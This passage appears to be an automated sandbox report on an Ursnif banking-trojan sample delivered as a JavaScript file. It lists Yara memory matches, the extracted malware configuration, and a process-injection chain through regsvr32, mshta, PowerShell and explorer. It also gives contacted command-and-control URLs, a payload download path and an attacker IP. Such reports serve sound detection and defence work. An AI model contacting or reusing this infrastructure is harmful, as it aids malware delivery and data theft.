Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5928, type: MEMORY

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5928, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "300", "system": "e1aacfc175c0ccc76580dfb2735a8c76hh-", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586236904", "user": "31b341dd54c8a3b79c4b2eb58a414dc9", "hash": "0x43f98375", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 220655 Sample: my_presentation_o6y.js Startdate: 06/04/2020 Architecture: WINDOWS Score: 100 42 api10.dianer.at 2->42 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 Multi AV Scanner detection for dropped file 2->50 52 9 other signatures 2->52 11 wscript.exe 3 2->11         started        15 iexplore.exe 5 432 2->15         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\Temp\TAvvi.txt, PE32 11->40 dropped 62 Benign windows process drops PE files 11->62 17 regsvr32.exe 11->17         started        19 iexplore.exe 10 259 15->19         started        22 iexplore.exe 258 15->22         started        24 iexplore.exe 258 15->24         started        signatures6 process7 dnsIp8 26 regsvr32.exe 2 1 17->26         started        44 f1.pipen.at 5.101.51.143, 49749, 49750, 49751 unknown Russian Federation 19->44 process9 signatures10 54 Writes to foreign memory regions 26->54 56 Allocates memory in foreign processes 26->56 58 Modifies the context of a thread in another process (thread injection) 26->58 60 4 other signatures 26->60 29 mshta.exe 26->29         started        32 control.exe 26->32         started        process11 signatures12 64 Suspicious powershell command line found 29->64 34 powershell.exe 29->34         started        66 Creates a thread in another existing process (thread injection) 32->66 36 explorer.exe 32->36 injected process13 process14 38 conhost.exe 34->38         started       

Simulations

Behavior and APIs

TimeTypeDescription
22:21:54API Interceptor41x Sleep call for process: powershell.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\TAvvi.txt100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\TAvvi.txt15%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
api10.dianer.at5%VirustotalBrowse
f1.pipen.at8%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.founder.com.cn/cn/bThe1%VirustotalBrowse
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
http://f1.pipen.at/api1/8iQXGwCpzdKMz8g3/vR1Bs0PsJjWOKd0/CgIrsJRd_2BvCvUxkm/EXOKfEHNo/sYKGsI3cQNMqIc2s8Lkt/2WJiM46ejLxs3iANNJ9/h0d_2F80v8eQI71I9xW1ix/X25fj7vexiZHH/25toGcJ2/4qCC4KWagf38YJweMGTX2yy/g2VE2_2FE4/qml86HUU6i7BR1mLC/EYgG2gZ_2BJv/tirHghlS6iC/oeDlpjoTA6Q2pQ/XDM2St3rAcudiIsIc_2B9/FXw73bdttSLdvg_0/A_0DzW3gUjl_2Fr/YsYX0XolzoV8_2Fstv/ZS_2BgcF_/2FGwEtDMf1jKkxNFe920/LlyrF9mJyINdvtY/9G_2F0%Avira URL Cloudsafe
http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
http://www.tiro.com0%VirustotalBrowse
http://www.tiro.com0%URL Reputationsafe
http://api10.dianer.at/jvassets/xI/t64.dat3%VirustotalBrowse
http://api10.dianer.at/jvassets/xI/t64.dat0%Avira URL Cloudsafe
http://www.goodfont.co.kr0%VirustotalBrowse
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.sajatypeworks.com0%VirustotalBrowse
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://f1.pipen.at/favicon.ico0%Avira URL Cloudsafe
http://fontfabrik.com0%VirustotalBrowse
http://fontfabrik.com0%URL Reputationsafe
http://www.founder.com.cn/cn0%VirustotalBrowse
http://www.founder.com.cn/cn0%URL Reputationsafe
http://f1.pipen.at/api1/olUj7VUg1W3_2B/Cm5em_2FIcoskF811yIlL/i5nyfJyOrsWaXAKa/wBuJs4wlgM_2BIy/t7o6sF4_2BEpb09e9D/e5ZukIG8o/FlemDlH5hm_2F_2BFN0s/2ZhIljtSaDFHSFEhyew/jBOrkKF_2FTTlaXJ3G7bcb/cK8SP8_2BRVIR/lu4YunYb/C7Y1WSSkLn2bCWF59L8cx45/SfuRwGoB6R/TJl48VgwKcXEC54Kl/Bzq0fT7_2FF_/2FQVuwY6mBp/UM3AQAfl6p2rLp/cMcs9TfWup_0A_0DRyv7X/E31Y4NNdfiq4NT8k/Gaeagtq3m74H3qK/lt2GxcKXxzzH0ftWw1/79Q1BmnDc/bht_2FB0%Avira URL Cloudsafe
http://f1.pipen.at/api1/fwo7DZYH_2BAKA9AO/nNoc7nnjpHEi/npqhf3GSHBr/v2V9gDEMWaip2f/WTZSyEKW70I6E_2BOGX8L/f1xas9